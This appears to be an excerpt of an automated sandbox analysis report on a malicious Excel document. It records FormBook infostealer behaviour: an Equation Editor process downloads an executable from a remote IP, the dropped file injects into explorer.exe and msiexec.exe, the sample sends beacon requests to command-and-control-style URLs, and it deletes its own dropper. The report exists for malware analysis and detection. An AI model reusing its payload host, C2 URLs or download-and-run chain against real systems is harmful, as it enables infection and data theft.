                                            Jan 13, 2022 20:09:02.137152910 CET8049167209.141.37.110192.168.2.22
                                            Jan 13, 2022 20:09:02.137160063 CET4916780192.168.2.22209.141.37.110
                                            Jan 13, 2022 20:09:02.137181044 CET8049167209.141.37.110192.168.2.22
                                            Jan 13, 2022 20:09:02.137185097 CET4916780192.168.2.22209.141.37.110
                                            Jan 13, 2022 20:09:02.137208939 CET8049167209.141.37.110192.168.2.22
                                            Jan 13, 2022 20:09:02.137212038 CET4916780192.168.2.22209.141.37.110
                                            Jan 13, 2022 20:09:02.137236118 CET8049167209.141.37.110192.168.2.22
                                            Jan 13, 2022 20:09:02.137240887 CET4916780192.168.2.22209.141.37.110
                                            Jan 13, 2022 20:09:02.137263060 CET8049167209.141.37.110192.168.2.22
                                            Jan 13, 2022 20:09:02.137271881 CET4916780192.168.2.22209.141.37.110
                                            Jan 13, 2022 20:09:02.137290001 CET8049167209.141.37.110192.168.2.22
                                            Jan 13, 2022 20:09:02.137299061 CET4916780192.168.2.22209.141.37.110

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Jan 13, 2022 20:10:29.553617001 CET5216753192.168.2.228.8.8.8
                                            Jan 13, 2022 20:10:29.587907076 CET53521678.8.8.8192.168.2.22
                                            Jan 13, 2022 20:10:34.676338911 CET5059153192.168.2.228.8.8.8
                                            Jan 13, 2022 20:10:34.719089031 CET53505918.8.8.8192.168.2.22
                                            Jan 13, 2022 20:10:40.952409983 CET5780553192.168.2.228.8.8.8
                                            Jan 13, 2022 20:10:41.128570080 CET53578058.8.8.8192.168.2.22

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                            Jan 13, 2022 20:10:29.553617001 CET192.168.2.228.8.8.80xc18cStandard query (0)www.aloebiotics.comA (IP address)IN (0x0001)
                                            Jan 13, 2022 20:10:34.676338911 CET192.168.2.228.8.8.80xfc43Standard query (0)www.mediafyagency.comA (IP address)IN (0x0001)
                                            Jan 13, 2022 20:10:40.952409983 CET192.168.2.228.8.8.80x9c63Standard query (0)www.sjljtzsls.comA (IP address)IN (0x0001)

                                            DNS Answers

                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                            Jan 13, 2022 20:10:29.587907076 CET8.8.8.8192.168.2.220xc18cNo error (0)www.aloebiotics.com64.190.62.111A (IP address)IN (0x0001)
                                            Jan 13, 2022 20:10:34.719089031 CET8.8.8.8192.168.2.220xfc43Name error (3)www.mediafyagency.comnonenoneA (IP address)IN (0x0001)
                                            Jan 13, 2022 20:10:41.128570080 CET8.8.8.8192.168.2.220x9c63No error (0)www.sjljtzsls.com163.197.71.43A (IP address)IN (0x0001)

                                            HTTP Request Dependency Graph

                                            • 209.141.37.110
                                            • www.aloebiotics.com
                                            • www.sjljtzsls.com

                                            HTTP Packets

                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            0192.168.2.2249167209.141.37.11080C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                            TimestampkBytes transferredDirectionData
                                            Jan 13, 2022 20:09:01.454904079 CET0OUTGET /hnmy.exe HTTP/1.1
                                            Accept: */*
                                            Accept-Encoding: gzip, deflate
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                            Host: 209.141.37.110
                                            Connection: Keep-Alive
                                            Jan 13, 2022 20:09:01.625545979 CET1INHTTP/1.1 200 OK
                                            Content-Type: application/octet-stream
                                            Last-Modified: Tue, 11 Jan 2022 22:12:56 GMT
                                            Accept-Ranges: bytes
                                            ETag: "109cc962387d81:0"
                                            Server: Microsoft-IIS/8.5
                                            Date: Fri, 14 Jan 2022 03:08:59 GMT
                                            Content-Length: 598016
                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 89 b6 f8 aa cd d7 96 f9 cd d7 96 f9 cd d7 96 f9 9b c8 85 f9 e8 d7 96 f9 cd d7 96 f9 f5 d7 96 f9 af c8 85 f9 de d7 96 f9 cd d7 97 f9 06 d6 96 f9 4e cb 98 f9 d6 d7 96 f9 25 c8 9c f9 46 d7 96 f9 25 c8 9d f9 ab d7 96 f9 75 d1 90 f9 cc d7 96 f9 52 69 63 68 cd d7 96 f9 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 74 9f 46 58 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 e0 03 00 00 30 05 00 00 00 00 00 35 5a 02 00 00 10 00 00 00 f0 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 70 09 00 00 10 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 41 05 00 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 35 f0 06 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 03 00 1c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 6d d7 03 00 00 10 00 00 00 e0 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6e 6c 01 00 00 f0 03 00 00 70 01 00 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 c8 a3 00 00 00 60 05 00 00 60 00 00 00 60 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 e8 cc 00 00 00 10 06 00 00 d0 00 00 00 c0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 62 64 61 74 61 00 00 a5 8e 02 00 00 e0 06 00 00 90 02 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$N%F%uRichPELtFX05Z@pA5.textm `.rdatanlp@@.data```@.bss@@.bdata@


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            1192.168.2.224916964.190.62.11180C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Jan 13, 2022 20:10:29.619673967 CET633OUTGET /b80i/?XXAT9NU=u8CFGDbLa+paDYPUt2HIfZvLGaLNzu7WkG1ejV9QOUI0TwLOmLGNbUmrlgsvnY/sa5UfOA==&bFQL=2dJLx4-Hc4v HTTP/1.1
                                            Host: www.aloebiotics.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Jan 13, 2022 20:10:29.667659998 CET634INHTTP/1.1 302 Found
                                            date: Thu, 13 Jan 2022 19:10:29 GMT
                                            content-type: text/html; charset=UTF-8
                                            content-length: 0
                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_GTxiloapR1ouiWajLwmhGMgatEfBQT8Lt/O7roGfPHtYFN3fCBkotTGrIMvL9hCe/C1t0kJPaTvqQKNkZwupGQ==
                                            expires: Mon, 26 Jul 1997 05:00:00 GMT
                                            cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                            pragma: no-cache
                                            last-modified: Thu, 13 Jan 2022 19:10:29 GMT
                                            location: https://sedo.com/search/details/?partnerid=324561&language=it&domain=aloebiotics.com&origin=sales_lander_1&utm_medium=Parking&utm_campaign=offerpage
                                            x-cache-miss-from: parking-78bc4f798d-x6gjq
                                            server: NginX
                                            connection: close


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            2192.168.2.2249170163.197.71.4380C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Jan 13, 2022 20:10:41.317248106 CET635OUTGET /b80i/?XXAT9NU=S1GZrcUjP6Mqu1rkaE68XUwdav2ZAuLdhfc3NoUcKUpIPYlLOeb3MkcjdHuyJHfoxw3F9Q==&bFQL=2dJLx4-Hc4v HTTP/1.1
                                            Host: www.sjljtzsls.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Jan 13, 2022 20:10:41.508686066 CET636INHTTP/1.1 200 OK
                                            Server: nginx
                                            Date: Thu, 13 Jan 2022 19:10:41 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            Vary: Accept-Encoding
                                            Data Raw: 62 66 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6a 73 2e 6a 73 22 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 3d 20 22 68 74 74 70 3a 2f 2f 73 6f 67 6f 75 2e 39 38 39 38 74 6f 70 31 2e 63 6f 6d 2f 73 73 63 78 2e 68 74 6d 6c 22 3b 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: bf<script language="javascript" type="text/javascript" src="/js.js" rel="nofollow"></script><script language="javascript"> window.location= "http://sogou.9898top1.com/sscx.html";</script>0


                                            Code Manipulations

                                            Statistics

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            Analysis Process: EXCEL.EXE PID: 2648 Parent PID: 596

                                            General

                                            Start time:20:08:29
                                            Start date:13/01/2022
                                            Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                            Imagebase:0x13fad0000
                                            File size:28253536 bytes
                                            MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            Analysis Process: EQNEDT32.EXE PID: 1960 Parent PID: 596

                                            General

                                            Start time:20:08:50
                                            Start date:13/01/2022
                                            Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                            Imagebase:0x400000
                                            File size:543304 bytes
                                            MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            Analysis Process: vbc.exe PID: 2240 Parent PID: 1960

                                            General

                                            Start time:20:08:54
                                            Start date:13/01/2022
                                            Path:C:\Users\Public\vbc.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\Public\vbc.exe"
                                            Imagebase:0x400000
                                            File size:598016 bytes
                                            MD5 hash:A21C93294EF3770C5C728A1B2D82FB92
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.525559537.000000000060D000.00000004.00000020.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.525559537.000000000060D000.00000004.00000020.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.525559537.000000000060D000.00000004.00000020.sdmp, Author: JPCERT/CC Incident Response Group
                                            Antivirus matches:
                                            • Detection: 100%, Avira
                                            • Detection: 100%, Joe Sandbox ML
                                            • Detection: 31%, Metadefender, Browse
                                            • Detection: 60%, ReversingLabs
                                            Reputation:low

                                            Analysis Process: vbc.exe PID: 2124 Parent PID: 2240

                                            General

                                            Start time:20:09:13
                                            Start date:13/01/2022
                                            Path:C:\Users\Public\vbc.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\Public\vbc.exe
                                            Imagebase:0x400000
                                            File size:598016 bytes
                                            MD5 hash:A21C93294EF3770C5C728A1B2D82FB92
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.560670130.00000000002F0000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.560670130.00000000002F0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.560670130.00000000002F0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.524809479.0000000000401000.00000020.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.524809479.0000000000401000.00000020.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.524809479.0000000000401000.00000020.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.560797840.0000000000430000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.560797840.0000000000430000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.560797840.0000000000430000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.560772297.0000000000401000.00000020.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.560772297.0000000000401000.00000020.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.560772297.0000000000401000.00000020.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.525124582.0000000000401000.00000020.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.525124582.0000000000401000.00000020.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.525124582.0000000000401000.00000020.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:low

                                            Analysis Process: explorer.exe PID: 1764 Parent PID: 2124

                                            General

                                            Start time:20:09:15
                                            Start date:13/01/2022
                                            Path:C:\Windows\explorer.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\Explorer.EXE
                                            Imagebase:0xffa10000
                                            File size:3229696 bytes
                                            MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.552022647.0000000009317000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.552022647.0000000009317000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.552022647.0000000009317000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.545422441.0000000009317000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.545422441.0000000009317000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.545422441.0000000009317000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:high

                                            Analysis Process: msiexec.exe PID: 2036 Parent PID: 1764

                                            General

                                            Start time:20:09:27
                                            Start date:13/01/2022
                                            Path:C:\Windows\SysWOW64\msiexec.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\msiexec.exe
                                            Imagebase:0xca0000
                                            File size:73216 bytes
                                            MD5 hash:4315D6ECAE85024A0567DF2CB253B7B0
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.698410685.00000000008D0000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.698410685.00000000008D0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.698410685.00000000008D0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.698075254.00000000000D0000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.698075254.00000000000D0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.698075254.00000000000D0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.698230838.00000000003D0000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.698230838.00000000003D0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.698230838.00000000003D0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:moderate

                                            Analysis Process: cmd.exe PID: 2640 Parent PID: 2036

                                            General

                                            Start time:20:09:31
                                            Start date:13/01/2022
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:/c del "C:\Users\Public\vbc.exe"
                                            Imagebase:0x4a4e0000
                                            File size:302592 bytes
                                            MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            Disassembly

                                            Code Analysis

                                            Reset < >